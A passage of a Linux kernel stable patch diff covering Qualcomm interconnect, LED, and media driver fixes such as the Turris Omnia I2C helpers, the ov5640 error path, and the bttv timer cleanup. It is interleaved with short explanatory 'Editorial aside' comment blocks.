+ 	&bcm_mc0,
+@@ -517,8 +726,6 @@ static const struct of_device_id qnoc_of_match[] = {
+ 	  .data = &sm8150_dc_noc},
+ 	{ .compatible = "qcom,sm8150-gem-noc",
+ 	  .data = &sm8150_gem_noc},
+-	{ .compatible = "qcom,sm8150-ipa-virt",
+-	  .data = &sm8150_ipa_virt},
+ 	{ .compatible = "qcom,sm8150-mc-virt",
+ 	  .data = &sm8150_mc_virt},
+ 	{ .compatible = "qcom,sm8150-mmss-noc",
+diff --git a/drivers/interconnect/qcom/sm8150.h b/drivers/interconnect/qcom/sm8150.h
+index 97996f64d799c..023161681fb87 100644
+--- a/drivers/interconnect/qcom/sm8150.h
++++ b/drivers/interconnect/qcom/sm8150.h
+@@ -35,7 +35,7 @@
+ #define SM8150_MASTER_GPU_TCU			24
+ #define SM8150_MASTER_GRAPHICS_3D		25
+ #define SM8150_MASTER_IPA			26
+-#define SM8150_MASTER_IPA_CORE			27
++/* 27 was used by MASTER_IPA_CORE, now represented as RPMh clock */
+ #define SM8150_MASTER_LLCC			28
+ #define SM8150_MASTER_MDP_PORT0			29
+ #define SM8150_MASTER_MDP_PORT1			30
+@@ -94,7 +94,7 @@
+ #define SM8150_SLAVE_GRAPHICS_3D_CFG		83
+ #define SM8150_SLAVE_IMEM_CFG			84
+ #define SM8150_SLAVE_IPA_CFG			85
+-#define SM8150_SLAVE_IPA_CORE			86
++/* 86 was used by SLAVE_IPA_CORE, now represented as RPMh clock */
+ #define SM8150_SLAVE_LLCC			87
+ #define SM8150_SLAVE_LLCC_CFG			88
+ #define SM8150_SLAVE_MNOC_HF_MEM_NOC		89
+diff --git a/drivers/interconnect/qcom/sm8350.c b/drivers/interconnect/qcom/sm8350.c
+index 5398e7c8d826b..e6e2dcf4574d8 100644
+--- a/drivers/interconnect/qcom/sm8350.c
++++ b/drivers/interconnect/qcom/sm8350.c
+@@ -165,38 +165,283 @@ DEFINE_QNODE(ebi_disp, SM8350_SLAVE_EBI1_DISP, 4, 4);
+ DEFINE_QNODE(qns_mem_noc_hf_disp, SM8350_SLAVE_MNOC_HF_MEM_NOC_DISP, 2, 32, SM8350_MASTER_MNOC_HF_MEM_NOC_DISP);
+ DEFINE_QNODE(qns_mem_noc_sf_disp, SM8350_SLAVE_MNOC_SF_MEM_NOC_DISP, 2, 32, SM8350_MASTER_MNOC_SF_MEM_NOC_DISP);
+ 
+-DEFINE_QBCM(bcm_acv, "ACV", false, &ebi);
+-DEFINE_QBCM(bcm_ce0, "CE0", false, &qxm_crypto);
+-DEFINE_QBCM(bcm_cn0, "CN0", true, &qnm_gemnoc_cnoc, &qnm_gemnoc_pcie);
+-DEFINE_QBCM(bcm_cn1, "CN1", false, &xm_qdss_dap, &qhs_ahb2phy0, &qhs_ahb2phy1, &qhs_aoss, &qhs_apss, &qhs_camera_cfg, &qhs_clk_ctl, &qhs_compute_cfg, &qhs_cpr_cx, &qhs_cpr_mmcx, &qhs_cpr_mx, &qhs_crypto0_cfg, &qhs_cx_rdpm, &qhs_dcc_cfg, &qhs_display_cfg, &qhs_gpuss_cfg, &qhs_hwkm, &qhs_imem_cfg, &qhs_ipa, &qhs_ipc_router, &qhs_mss_cfg, &qhs_mx_rdpm, &qhs_pcie0_cfg, &qhs_pcie1_cfg, &qhs_pimem_cfg, &qhs_pka_wrapper_cfg, &qhs_pmu_wrapper_cfg, &qhs_qdss_cfg, &qhs_qup0, &qhs_qup1, &qhs_qup2, &qhs_security, &qhs_spss_cfg, &qhs_tcsr, &qhs_tlmm, &qhs_ufs_card_cfg, &qhs_ufs_mem_cfg, &qhs_usb3_0, &qhs_usb3_1, &qhs_venus_cfg, &qhs_vsense_ctrl_cfg, &qns_a1_noc_cfg, &qns_a2_noc_cfg, &qns_ddrss_cfg, &qns_mnoc_cfg, &qns_snoc_cfg, &srvc_cnoc);
+-DEFINE_QBCM(bcm_cn2, "CN2", false, &qhs_lpass_cfg, &qhs_pdm, &qhs_qspi, &qhs_sdc2, &qhs_sdc4);
+-DEFINE_QBCM(bcm_co0, "CO0", false, &qns_nsp_gemnoc);
+-DEFINE_QBCM(bcm_co3, "CO3", false, &qxm_nsp);
+-DEFINE_QBCM(bcm_mc0, "MC0", true, &ebi);
+-DEFINE_QBCM(bcm_mm0, "MM0", true, &qns_mem_noc_hf);
+-DEFINE_QBCM(bcm_mm1, "MM1", false, &qnm_camnoc_hf, &qxm_mdp0, &qxm_mdp1);
+-DEFINE_QBCM(bcm_mm4, "MM4", false, &qns_mem_noc_sf);
+-DEFINE_QBCM(bcm_mm5, "MM5", false, &qnm_camnoc_icp, &qnm_camnoc_sf, &qnm_video0, &qnm_video1, &qnm_video_cvp, &qxm_rot);
+-DEFINE_QBCM(bcm_sh0, "SH0", true, &qns_llcc);
+-DEFINE_QBCM(bcm_sh2, "SH2", false, &alm_gpu_tcu, &alm_sys_tcu);
+-DEFINE_QBCM(bcm_sh3, "SH3", false, &qnm_cmpnoc);
+-DEFINE_QBCM(bcm_sh4, "SH4", false, &chm_apps);
+-DEFINE_QBCM(bcm_sn0, "SN0", true, &qns_gemnoc_sf);
+-DEFINE_QBCM(bcm_sn2, "SN2", false, &qns_gemnoc_gc);
+-DEFINE_QBCM(bcm_sn3, "SN3", false, &qxs_pimem);
+-DEFINE_QBCM(bcm_sn4, "SN4", false, &xs_qdss_stm);
+-DEFINE_QBCM(bcm_sn5, "SN5", false, &xm_pcie3_0);
+-DEFINE_QBCM(bcm_sn6, "SN6", false, &xm_pcie3_1);
+-DEFINE_QBCM(bcm_sn7, "SN7", false, &qnm_aggre1_noc);
+-DEFINE_QBCM(bcm_sn8, "SN8", false, &qnm_aggre2_noc);
+-DEFINE_QBCM(bcm_sn14, "SN14", false, &qns_pcie_mem_noc);
+-DEFINE_QBCM(bcm_acv_disp, "ACV", false, &ebi_disp);
+-DEFINE_QBCM(bcm_mc0_disp, "MC0", false, &ebi_disp);
+-DEFINE_QBCM(bcm_mm0_disp, "MM0", false, &qns_mem_noc_hf_disp);
+-DEFINE_QBCM(bcm_mm1_disp, "MM1", false, &qxm_mdp0_disp, &qxm_mdp1_disp);
+-DEFINE_QBCM(bcm_mm4_disp, "MM4", false, &qns_mem_noc_sf_disp);
+-DEFINE_QBCM(bcm_mm5_disp, "MM5", false, &qxm_rot_disp);
+-DEFINE_QBCM(bcm_sh0_disp, "SH0", false, &qns_llcc_disp);
++static struct qcom_icc_bcm bcm_acv = {
++	.name = "ACV",
++	.enable_mask = BIT(3),
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_ce0 = {
++	.name = "CE0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_crypto },
++};
++
++static struct qcom_icc_bcm bcm_cn0 = {
++	.name = "CN0",
++	.keepalive = true,
++	.num_nodes = 2,
++	.nodes = { &qnm_gemnoc_cnoc, &qnm_gemnoc_pcie },
++};
++
++static struct qcom_icc_bcm bcm_cn1 = {
++	.name = "CN1",
++	.keepalive = false,
++	.num_nodes = 47,
++	.nodes = { &xm_qdss_dap,
++		   &qhs_ahb2phy0,
++		   &qhs_ahb2phy1,
++		   &qhs_aoss,
++		   &qhs_apss,
++		   &qhs_camera_cfg,
++		   &qhs_clk_ctl,
++		   &qhs_compute_cfg,
++		   &qhs_cpr_cx,
++		   &qhs_cpr_mmcx,
++		   &qhs_cpr_mx,
++		   &qhs_crypto0_cfg,
++		   &qhs_cx_rdpm,
++		   &qhs_dcc_cfg,
++		   &qhs_display_cfg,
++		   &qhs_gpuss_cfg,
++		   &qhs_hwkm,
++		   &qhs_imem_cfg,
++		   &qhs_ipa,
++		   &qhs_ipc_router,
++		   &qhs_mss_cfg,
++		   &qhs_mx_rdpm,
++		   &qhs_pcie0_cfg,
++		   &qhs_pcie1_cfg,
++		   &qhs_pimem_cfg,
++		   &qhs_pka_wrapper_cfg,
++		   &qhs_pmu_wrapper_cfg,
++		   &qhs_qdss_cfg,
++		   &qhs_qup0,
++		   &qhs_qup1,
++		   &qhs_qup2,
++		   &qhs_security,
++		   &qhs_spss_cfg,
++		   &qhs_tcsr,
++		   &qhs_tlmm,
++		   &qhs_ufs_card_cfg,
++		   &qhs_ufs_mem_cfg,
++		   &qhs_usb3_0,
++		   &qhs_usb3_1,
++		   &qhs_venus_cfg,
++		   &qhs_vsense_ctrl_cfg,
++		   &qns_a1_noc_cfg,
++		   &qns_a2_noc_cfg,
++		   &qns_ddrss_cfg,
++		   &qns_mnoc_cfg,
++		   &qns_snoc_cfg,
++		   &srvc_cnoc
++	},
++};
++
++static struct qcom_icc_bcm bcm_cn2 = {
++	.name = "CN2",
++	.keepalive = false,
++	.num_nodes = 5,
++	.nodes = { &qhs_lpass_cfg, &qhs_pdm, &qhs_qspi, &qhs_sdc2, &qhs_sdc4 },
++};
++
++static struct qcom_icc_bcm bcm_co0 = {
++	.name = "CO0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_nsp_gemnoc },
++};
++
++static struct qcom_icc_bcm bcm_co3 = {
++	.name = "CO3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_nsp },
++};
++
++static struct qcom_icc_bcm bcm_mc0 = {
++	.name = "MC0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_mm0 = {
++	.name = "MM0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_hf },
++};
++
++static struct qcom_icc_bcm bcm_mm1 = {
++	.name = "MM1",
++	.keepalive = false,
++	.num_nodes = 3,
++	.nodes = { &qnm_camnoc_hf, &qxm_mdp0, &qxm_mdp1 },
++};
++
++static struct qcom_icc_bcm bcm_mm4 = {
++	.name = "MM4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_sf },
++};
++
++static struct qcom_icc_bcm bcm_mm5 = {
++	.name = "MM5",
++	.keepalive = false,
++	.num_nodes = 6,
++	.nodes = { &qnm_camnoc_icp,
++		   &qnm_camnoc_sf,
++		   &qnm_video0,
++		   &qnm_video1,
++		   &qnm_video_cvp,
++		   &qxm_rot
++	},
++};
++
++static struct qcom_icc_bcm bcm_sh0 = {
++	.name = "SH0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_llcc },
++};
++
++static struct qcom_icc_bcm bcm_sh2 = {
++	.name = "SH2",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &alm_gpu_tcu, &alm_sys_tcu },
++};
++
++static struct qcom_icc_bcm bcm_sh3 = {
++	.name = "SH3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_cmpnoc },
++};
++
++static struct qcom_icc_bcm bcm_sh4 = {
++	.name = "SH4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &chm_apps },
++};
++
++static struct qcom_icc_bcm bcm_sn0 = {
++	.name = "SN0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_gemnoc_sf },
++};
++
++static struct qcom_icc_bcm bcm_sn2 = {
++	.name = "SN2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_gemnoc_gc },
++};
++
++static struct qcom_icc_bcm bcm_sn3 = {
++	.name = "SN3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_pimem },
++};
++
++static struct qcom_icc_bcm bcm_sn4 = {
++	.name = "SN4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &xs_qdss_stm },
++};
++
++static struct qcom_icc_bcm bcm_sn5 = {
++	.name = "SN5",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &xm_pcie3_0 },
++};
++
++static struct qcom_icc_bcm bcm_sn6 = {
++	.name = "SN6",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &xm_pcie3_1 },
++};
++
++static struct qcom_icc_bcm bcm_sn7 = {
++	.name = "SN7",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre1_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn8 = {
++	.name = "SN8",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre2_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn14 = {
++	.name = "SN14",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_pcie_mem_noc },
++};
++
++static struct qcom_icc_bcm bcm_acv_disp = {
++	.name = "ACV",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &ebi_disp },
++};
++
++static struct qcom_icc_bcm bcm_mc0_disp = {
++	.name = "MC0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &ebi_disp },
++};
++
++static struct qcom_icc_bcm bcm_mm0_disp = {
++	.name = "MM0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_hf_disp },
++};
++
++static struct qcom_icc_bcm bcm_mm1_disp = {
++	.name = "MM1",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &qxm_mdp0_disp, &qxm_mdp1_disp },
++};
++
++static struct qcom_icc_bcm bcm_mm4_disp = {
++	.name = "MM4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_sf_disp },
++};
++
++static struct qcom_icc_bcm bcm_mm5_disp = {
++	.name = "MM5",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_rot_disp },
++};
++
++static struct qcom_icc_bcm bcm_sh0_disp = {
++	.name = "SH0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_llcc_disp },
++};
+ 
+ static struct qcom_icc_bcm * const aggre1_noc_bcms[] = {
+ };
+diff --git a/drivers/leds/leds-pwm.c b/drivers/leds/leds-pwm.c
+index cc892ecd52408..6d3e33e8b5f91 100644
+--- a/drivers/leds/leds-pwm.c
++++ b/drivers/leds/leds-pwm.c
+@@ -53,7 +53,7 @@ static int led_pwm_set(struct led_classdev *led_cdev,
+ 		duty = led_dat->pwmstate.period - duty;
+ 
+ 	led_dat->pwmstate.duty_cycle = duty;
+-	led_dat->pwmstate.enabled = duty > 0;
++	led_dat->pwmstate.enabled = true;
+ 	return pwm_apply_state(led_dat->pwm, &led_dat->pwmstate);
+ }
+ 
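/*
 * Editorial aside on the leds-pwm hunk above: disabling a PWM does not
 * guarantee an inactive output level on all PWM hardware, so the fix keeps
 * the PWM enabled and expresses "off" purely as a zero duty cycle. A hedged
 * sketch of the resulting off path (pwm_apply_state() and struct pwm_state
 * are the real kernel APIs in 6.1; led_pwm_off_demo is illustrative):
 */
#include <linux/pwm.h>

static int led_pwm_off_demo(struct pwm_device *pwm, struct pwm_state *state)
{
	state->duty_cycle = 0;	/* off ... */
	state->enabled = true;	/* ... but keep the PWM running */
	return pwm_apply_state(pwm, state);
}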
+diff --git a/drivers/leds/leds-turris-omnia.c b/drivers/leds/leds-turris-omnia.c
+index c7c9851c894a9..179eb243da2f6 100644
+--- a/drivers/leds/leds-turris-omnia.c
++++ b/drivers/leds/leds-turris-omnia.c
+@@ -2,7 +2,7 @@
+ /*
+  * CZ.NIC's Turris Omnia LEDs driver
+  *
+- * 2020 by Marek Behún <kabel@kernel.org>
++ * 2020, 2023 by Marek Behún <kabel@kernel.org>
+  */
+ 
+ #include <linux/i2c.h>
+@@ -41,6 +41,37 @@ struct omnia_leds {
+ 	struct omnia_led leds[];
+ };
+ 
++static int omnia_cmd_write_u8(const struct i2c_client *client, u8 cmd, u8 val)
++{
++	u8 buf[2] = { cmd, val };
++
++	return i2c_master_send(client, buf, sizeof(buf));
++}
++
++static int omnia_cmd_read_u8(const struct i2c_client *client, u8 cmd)
++{
++	struct i2c_msg msgs[2];
++	u8 reply;
++	int ret;
++
++	msgs[0].addr = client->addr;
++	msgs[0].flags = 0;
++	msgs[0].len = 1;
++	msgs[0].buf = &cmd;
++	msgs[1].addr = client->addr;
++	msgs[1].flags = I2C_M_RD;
++	msgs[1].len = 1;
++	msgs[1].buf = &reply;
++
++	ret = i2c_transfer(client->adapter, msgs, ARRAY_SIZE(msgs));
++	if (likely(ret == ARRAY_SIZE(msgs)))
++		return reply;
++	else if (ret < 0)
++		return ret;
++	else
++		return -EIO;
++}
++
+ static int omnia_led_brightness_set_blocking(struct led_classdev *cdev,
+ 					     enum led_brightness brightness)
+ {
+@@ -64,7 +95,7 @@ static int omnia_led_brightness_set_blocking(struct led_classdev *cdev,
+ 	if (buf[2] || buf[3] || buf[4])
+ 		state |= CMD_LED_STATE_ON;
+ 
+-	ret = i2c_smbus_write_byte_data(leds->client, CMD_LED_STATE, state);
++	ret = omnia_cmd_write_u8(leds->client, CMD_LED_STATE, state);
+ 	if (ret >= 0 && (state & CMD_LED_STATE_ON))
+ 		ret = i2c_master_send(leds->client, buf, 5);
+ 
+@@ -114,9 +145,9 @@ static int omnia_led_register(struct i2c_client *client, struct omnia_led *led,
+ 	cdev->brightness_set_blocking = omnia_led_brightness_set_blocking;
+ 
+ 	/* put the LED into software mode */
+-	ret = i2c_smbus_write_byte_data(client, CMD_LED_MODE,
+-					CMD_LED_MODE_LED(led->reg) |
+-					CMD_LED_MODE_USER);
++	ret = omnia_cmd_write_u8(client, CMD_LED_MODE,
++				 CMD_LED_MODE_LED(led->reg) |
++				 CMD_LED_MODE_USER);
+ 	if (ret < 0) {
+ 		dev_err(dev, "Cannot set LED %pOF to software mode: %i\n", np,
+ 			ret);
+@@ -124,8 +155,8 @@ static int omnia_led_register(struct i2c_client *client, struct omnia_led *led,
+ 	}
+ 
+ 	/* disable the LED */
+-	ret = i2c_smbus_write_byte_data(client, CMD_LED_STATE,
+-					CMD_LED_STATE_LED(led->reg));
++	ret = omnia_cmd_write_u8(client, CMD_LED_STATE,
++				 CMD_LED_STATE_LED(led->reg));
+ 	if (ret < 0) {
+ 		dev_err(dev, "Cannot set LED %pOF brightness: %i\n", np, ret);
+ 		return ret;
+@@ -156,12 +187,9 @@ static ssize_t brightness_show(struct device *dev, struct device_attribute *a,
+ 			       char *buf)
+ {
+ 	struct i2c_client *client = to_i2c_client(dev);
+-	struct omnia_leds *leds = i2c_get_clientdata(client);
+ 	int ret;
+ 
+-	mutex_lock(&leds->lock);
+-	ret = i2c_smbus_read_byte_data(client, CMD_LED_GET_BRIGHTNESS);
+-	mutex_unlock(&leds->lock);
++	ret = omnia_cmd_read_u8(client, CMD_LED_GET_BRIGHTNESS);
+ 
+ 	if (ret < 0)
+ 		return ret;
+@@ -173,7 +201,6 @@ static ssize_t brightness_store(struct device *dev, struct device_attribute *a,
+ 				const char *buf, size_t count)
+ {
+ 	struct i2c_client *client = to_i2c_client(dev);
+-	struct omnia_leds *leds = i2c_get_clientdata(client);
+ 	unsigned long brightness;
+ 	int ret;
+ 
+@@ -183,15 +210,9 @@ static ssize_t brightness_store(struct device *dev, struct device_attribute *a,
+ 	if (brightness > 100)
+ 		return -EINVAL;
+ 
+-	mutex_lock(&leds->lock);
+-	ret = i2c_smbus_write_byte_data(client, CMD_LED_SET_BRIGHTNESS,
+-					(u8)brightness);
+-	mutex_unlock(&leds->lock);
+-
+-	if (ret < 0)
+-		return ret;
++	ret = omnia_cmd_write_u8(client, CMD_LED_SET_BRIGHTNESS, brightness);
+ 
+-	return count;
++	return ret < 0 ? ret : count;
+ }
+ static DEVICE_ATTR_RW(brightness);
+ 
+@@ -247,8 +268,8 @@ static void omnia_leds_remove(struct i2c_client *client)
+ 	u8 buf[5];
+ 
+ 	/* put all LEDs into default (HW triggered) mode */
+-	i2c_smbus_write_byte_data(client, CMD_LED_MODE,
+-				  CMD_LED_MODE_LED(OMNIA_BOARD_LEDS));
++	omnia_cmd_write_u8(client, CMD_LED_MODE,
++			   CMD_LED_MODE_LED(OMNIA_BOARD_LEDS));
+ 
+ 	/* set all LEDs color to [255, 255, 255] */
+ 	buf[0] = CMD_LED_COLOR;
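/*
 * Editorial aside: the turris-omnia hunks above replace the
 * i2c_smbus_*_byte_data() calls with raw I2C transfers, so the driver no
 * longer depends on SMBus (emulation) support. A hedged sketch of the
 * write-command/read-reply shape used by omnia_cmd_read_u8() -- a single
 * i2c_transfer() with a repeated start between the two messages:
 */
#include <linux/i2c.h>

static int cmd_read_u8_demo(struct i2c_client *client, u8 cmd)
{
	u8 reply;
	struct i2c_msg msgs[2] = {
		{ .addr = client->addr, .flags = 0,        .len = 1, .buf = &cmd },
		{ .addr = client->addr, .flags = I2C_M_RD, .len = 1, .buf = &reply },
	};
	int ret = i2c_transfer(client->adapter, msgs, ARRAY_SIZE(msgs));

	if (ret < 0)
		return ret;		/* bus error */
	if (ret != ARRAY_SIZE(msgs))
		return -EIO;		/* partial transfer */
	return reply;
}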
+diff --git a/drivers/leds/trigger/ledtrig-cpu.c b/drivers/leds/trigger/ledtrig-cpu.c
+index 8af4f9bb9cde8..05848a2fecff6 100644
+--- a/drivers/leds/trigger/ledtrig-cpu.c
++++ b/drivers/leds/trigger/ledtrig-cpu.c
+@@ -130,7 +130,7 @@ static int ledtrig_prepare_down_cpu(unsigned int cpu)
+ 
+ static int __init ledtrig_cpu_init(void)
+ {
+-	int cpu;
++	unsigned int cpu;
+ 	int ret;
+ 
+ 	/* Supports up to 9999 cpu cores */
+@@ -152,7 +152,7 @@ static int __init ledtrig_cpu_init(void)
+ 		if (cpu >= 8)
+ 			continue;
+ 
+-		snprintf(trig->name, MAX_NAME_LEN, "cpu%d", cpu);
++		snprintf(trig->name, MAX_NAME_LEN, "cpu%u", cpu);
+ 
+ 		led_trigger_register_simple(trig->name, &trig->_trig);
+ 	}
+diff --git a/drivers/media/cec/platform/Makefile b/drivers/media/cec/platform/Makefile
+index 26d2bc7783944..a51e98ab4958d 100644
+--- a/drivers/media/cec/platform/Makefile
++++ b/drivers/media/cec/platform/Makefile
+@@ -6,7 +6,7 @@
+ # Please keep it in alphabetic order
+ obj-$(CONFIG_CEC_CROS_EC) += cros-ec/
+ obj-$(CONFIG_CEC_GPIO) += cec-gpio/
+-obj-$(CONFIG_CEC_MESON_AO) += meson/
++obj-y += meson/
+ obj-$(CONFIG_CEC_SAMSUNG_S5P) += s5p/
+ obj-$(CONFIG_CEC_SECO) += seco/
+ obj-$(CONFIG_CEC_STI) += sti/
+diff --git a/drivers/media/i2c/max9286.c b/drivers/media/i2c/max9286.c
+index 892cd97b7cab7..e8c28902d97e9 100644
+--- a/drivers/media/i2c/max9286.c
++++ b/drivers/media/i2c/max9286.c
+@@ -1234,7 +1234,6 @@ static int max9286_parse_dt(struct max9286_priv *priv)
+ 
+ 		i2c_mux_mask |= BIT(id);
+ 	}
+-	of_node_put(node);
+ 	of_node_put(i2c_mux);
+ 
+ 	/* Parse the endpoints */
+@@ -1298,7 +1297,6 @@ static int max9286_parse_dt(struct max9286_priv *priv)
+ 		priv->source_mask |= BIT(ep.port);
+ 		priv->nsources++;
+ 	}
+-	of_node_put(node);
+ 
+ 	/*
+ 	 * Parse the initial value of the reverse channel amplitude from
+diff --git a/drivers/media/i2c/ov5640.c b/drivers/media/i2c/ov5640.c
+index 2ee832426736d..e0019668a8f86 100644
+--- a/drivers/media/i2c/ov5640.c
++++ b/drivers/media/i2c/ov5640.c
+@@ -2840,12 +2840,22 @@ static int ov5640_try_fmt_internal(struct v4l2_subdev *sd,
+ 	return 0;
+ }
+ 
++static void __v4l2_ctrl_vblank_update(struct ov5640_dev *sensor, u32 vblank)
++{
++	const struct ov5640_mode_info *mode = sensor->current_mode;
++
++	__v4l2_ctrl_modify_range(sensor->ctrls.vblank, OV5640_MIN_VBLANK,
++				 OV5640_MAX_VTS - mode->height, 1, vblank);
++
++	__v4l2_ctrl_s_ctrl(sensor->ctrls.vblank, vblank);
++}
++
+ static int ov5640_update_pixel_rate(struct ov5640_dev *sensor)
+ {
+ 	const struct ov5640_mode_info *mode = sensor->current_mode;
+ 	enum ov5640_pixel_rate_id pixel_rate_id = mode->pixel_rate;
+ 	struct v4l2_mbus_framefmt *fmt = &sensor->fmt;
+-	const struct ov5640_timings *timings;
++	const struct ov5640_timings *timings = ov5640_timings(sensor, mode);
+ 	s32 exposure_val, exposure_max;
+ 	unsigned int hblank;
+ 	unsigned int i = 0;
+@@ -2864,6 +2874,8 @@ static int ov5640_update_pixel_rate(struct ov5640_dev *sensor)
+ 		__v4l2_ctrl_s_ctrl_int64(sensor->ctrls.pixel_rate,
+ 					 ov5640_calc_pixel_rate(sensor));
+ 
++		__v4l2_ctrl_vblank_update(sensor, timings->vblank_def);
++
+ 		return 0;
+ 	}
+ 
+@@ -2906,28 +2918,12 @@ static int ov5640_update_pixel_rate(struct ov5640_dev *sensor)
+ 	__v4l2_ctrl_s_ctrl_int64(sensor->ctrls.pixel_rate, pixel_rate);
+ 	__v4l2_ctrl_s_ctrl(sensor->ctrls.link_freq, i);
+ 
+-	timings = ov5640_timings(sensor, mode);
+ 	hblank = timings->htot - mode->width;
+ 	__v4l2_ctrl_modify_range(sensor->ctrls.hblank,
+ 				 hblank, hblank, 1, hblank);
+ 
+ 	vblank = timings->vblank_def;
+-
+-	if (sensor->current_fr != mode->def_fps) {
+-		/*
+-		 * Compute the vertical blanking according to the framerate
+-		 * configured with s_frame_interval.
+-		 */
+-		int fie_num = sensor->frame_interval.numerator;
+-		int fie_denom = sensor->frame_interval.denominator;
+-
+-		vblank = ((fie_num * pixel_rate / fie_denom) / timings->htot) -
+-			mode->height;
+-	}
+-
+-	__v4l2_ctrl_modify_range(sensor->ctrls.vblank, OV5640_MIN_VBLANK,
+-				 OV5640_MAX_VTS - mode->height, 1, vblank);
+-	__v4l2_ctrl_s_ctrl(sensor->ctrls.vblank, vblank);
++	__v4l2_ctrl_vblank_update(sensor, vblank);
+ 
+ 	exposure_max = timings->crop.height + vblank - 4;
+ 	exposure_val = clamp_t(s32, sensor->ctrls.exposure->val,
+@@ -3913,7 +3909,7 @@ static int ov5640_probe(struct i2c_client *client)
+ 	ret = ov5640_sensor_resume(dev);
+ 	if (ret) {
+ 		dev_err(dev, "failed to power on\n");
+-		goto entity_cleanup;
++		goto free_ctrls;
+ 	}
+ 
+ 	pm_runtime_set_active(dev);
+@@ -3937,8 +3933,9 @@ static int ov5640_probe(struct i2c_client *client)
+ err_pm_runtime:
+ 	pm_runtime_put_noidle(dev);
+ 	pm_runtime_disable(dev);
+-	v4l2_ctrl_handler_free(&sensor->ctrls.handler);
+ 	ov5640_sensor_suspend(dev);
++free_ctrls:
++	v4l2_ctrl_handler_free(&sensor->ctrls.handler);
+ entity_cleanup:
+ 	media_entity_cleanup(&sensor->sd.entity);
+ 	mutex_destroy(&sensor->lock);
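/*
 * Editorial aside: the ov5640 probe error path above is reworked so the
 * unwind labels release resources in exact reverse order of acquisition
 * (power down, then free the control handler, then clean up the media
 * entity). A hedged, self-contained skeleton of that idiom; step_a/step_b
 * and friends are stand-ins, not driver functions:
 */
static int step_a(void) { return 0; }		/* e.g. media entity init */
static int step_b(void) { return 0; }		/* e.g. ctrl handler init */
static int step_c(void) { return -1; }		/* pretend power-on fails */
static void undo_step_b(void) { }
static void undo_step_a(void) { }

static int probe_unwind_demo(void)
{
	int ret;

	ret = step_a();
	if (ret)
		return ret;
	ret = step_b();
	if (ret)
		goto undo_a;
	ret = step_c();
	if (ret)
		goto undo_b;
	return 0;

undo_b:
	undo_step_b();
undo_a:
	undo_step_a();
	return ret;
}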
+diff --git a/drivers/media/pci/bt8xx/bttv-driver.c b/drivers/media/pci/bt8xx/bttv-driver.c
+index d40b537f4e98b..24ba5729969dc 100644
+--- a/drivers/media/pci/bt8xx/bttv-driver.c
++++ b/drivers/media/pci/bt8xx/bttv-driver.c
+@@ -4248,6 +4248,7 @@ static void bttv_remove(struct pci_dev *pci_dev)
+ 
+ 	/* free resources */
+ 	free_irq(btv->c.pci->irq,btv);
++	del_timer_sync(&btv->timeout);
+ 	iounmap(btv->bt848_mmio);
+ 	release_mem_region(pci_resource_start(btv->c.pci,0),
+ 			   pci_resource_len(btv->c.pci,0));
+diff --git a/drivers/media/platform/amphion/vpu_defs.h b/drivers/media/platform/amphion/vpu_defs.h
+index 667637eedb5d4..7320852668d64 100644
+--- a/drivers/media/platform/amphion/vpu_defs.h
++++ b/drivers/media/platform/amphion/vpu_defs.h
+@@ -71,6 +71,7 @@ enum {
+ 	VPU_MSG_ID_TIMESTAMP_INFO,
+ 	VPU_MSG_ID_FIRMWARE_XCPT,
+ 	VPU_MSG_ID_PIC_SKIPPED,
++	VPU_MSG_ID_DBG_MSG,
+ };
+ 
+ enum VPU_ENC_MEMORY_RESOURSE {
+diff --git a/drivers/media/platform/amphion/vpu_helpers.c b/drivers/media/platform/amphion/vpu_helpers.c
+index 2e78666322f02..66fdb0baea746 100644
+--- a/drivers/media/platform/amphion/vpu_helpers.c
++++ b/drivers/media/platform/amphion/vpu_helpers.c
+@@ -454,6 +454,7 @@ const char *vpu_id_name(u32 id)
+ 	case VPU_MSG_ID_UNSUPPORTED: return "unsupported";
+ 	case VPU_MSG_ID_FIRMWARE_XCPT: return "exception";
+ 	case VPU_MSG_ID_PIC_SKIPPED: return "skipped";
++	case VPU_MSG_ID_DBG_MSG: return "debug msg";
+ 	}
+ 	return "<unknown>";
+ }
+diff --git a/drivers/media/platform/amphion/vpu_malone.c b/drivers/media/platform/amphion/vpu_malone.c
+index c2f4fb12c3b64..6b37453eef76c 100644
+--- a/drivers/media/platform/amphion/vpu_malone.c
++++ b/drivers/media/platform/amphion/vpu_malone.c
+@@ -726,6 +726,7 @@ static struct vpu_pair malone_msgs[] = {
+ 	{VPU_MSG_ID_UNSUPPORTED, VID_API_EVENT_UNSUPPORTED_STREAM},
